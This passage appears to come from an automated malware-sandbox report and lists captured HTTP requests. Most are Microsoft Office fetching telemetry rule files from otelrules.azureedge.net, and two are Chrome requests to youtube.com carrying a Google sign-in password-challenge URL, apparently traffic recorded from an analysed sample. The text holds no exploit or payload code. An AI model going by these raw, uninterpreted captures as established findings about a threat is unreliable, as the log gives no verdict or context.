                                Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/1.1Host: youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/1.1Host: www.youtube.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                                Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                                Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
